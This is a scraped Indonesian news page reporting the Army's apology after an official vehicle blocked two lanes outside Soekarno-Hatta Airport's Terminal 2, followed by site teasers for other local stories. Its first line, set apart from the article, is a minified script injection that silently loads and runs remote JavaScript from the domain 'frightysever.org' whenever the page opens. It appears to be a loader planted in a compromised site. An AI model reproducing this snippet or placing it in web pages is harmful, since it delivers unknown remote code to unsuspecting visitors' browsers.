(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
WARGA +62

Viral Parkir Mobil Dinas TNI AD Bikin Macet di Bandara Soetta


KANALKALIMANTAN.COM – TNI Angkatan Darat menyampaikan permohonan maaf atas adanya keluhan masyarakat terkait kendaraan dinas TNI AD yang parkir di jalan depan terminal 2 Bandara Soekarno Hatta hingga mengganggu kenyamanan pengendara lainnya. Kendaraan dinas yang diparkir itu sampai memakan dua jalur jalan.

Permohonan maaf itu disampaikan oleh Kepala Dinas Penerangan TNI AD (Kadispenad) Brigjen TNI Tatang Subarna melalui keterangan persnya.

“Saya atas nama institusi TNI AD menyampaikan permohonan maaf atas ketidaknyamanan yang dilakukan oleh oknum pengemudi kendaraan TNI AD tersebut,” kata Tatang pada Senin (9/5/2022).

Dalam kesempatan yang sama, Tatang juga menyayangkan atas kejadian tersebut. Ia lantas mengimbau kepada pengemudi yang menggunakan kendaraan dinas untuk lebih tertib menaati peraturan.

 

 

Baca juga: Polisi Berpangkat Briptu Terlibat Ilegal Mining di Kaltara, 17 Kontainer Diduga Samarkan Pengiriman Narkoba

“Taati peraturan sesuai perundang-undangan yang berlaku serta tidak bertindak arogan sehingga mencemarkan nama baik institusi,” tuturnya.

Lebih lanjut Tatang kembali mengimbau kepada para pemilik atau penanggung jawab kendaraan dinas khususnya di jajaran TNI AD agar mengingatkan para pengemudinya untuk taat aturan dalam berlalulintas di jalan raya sesuai aturan dan peraturan yang berlaku.

“Semoga hal seperti ini tidak terulang kembali,” ucapnya.

Keluhan Warganet

Seorang pemilik akun Twitter @hotradero menyampaikan keluhannya soal kendaraan dinas TNI AD yang terparkir di depan terminal 2 Bandara Soekarno-Hatta. Menurut keterangan satpam yang berjaga di sana, para penjemput enggan menunggu di tempat parkir yang telah disediakan.

“Jalanan macet parah karena ada pejabat pulang dijemput fasilitas protokoler yang ngotot maunya nunggu di pinggir jalan. Dua jalur habis dimakan mobil mereka. Sisa satu,” kata @hotradero pada Minggu (8/5/2022).

Baca juga: INNALILLAHI. Adik Kandung Gus Dur, Lily Chodidjah Wahid Wafat

“‘Mereka nggak mau nunggu di tempat parkir pak’ demikian kata satpam,” tambahnya.

Pemilik akun Twitter tersebut juga mengunggah foto sebagai bukti. Foto itu diambil olehnya di tempat penumpang biasa menunggu taksi sekitar pukul 19.56 WIB. (Suara.com)

Editor : kk


Risa

Recent Posts

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

3 menit ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

23 menit ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

2 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

3 jam ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

4 jam ago

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

5 jam ago

This website uses cookies.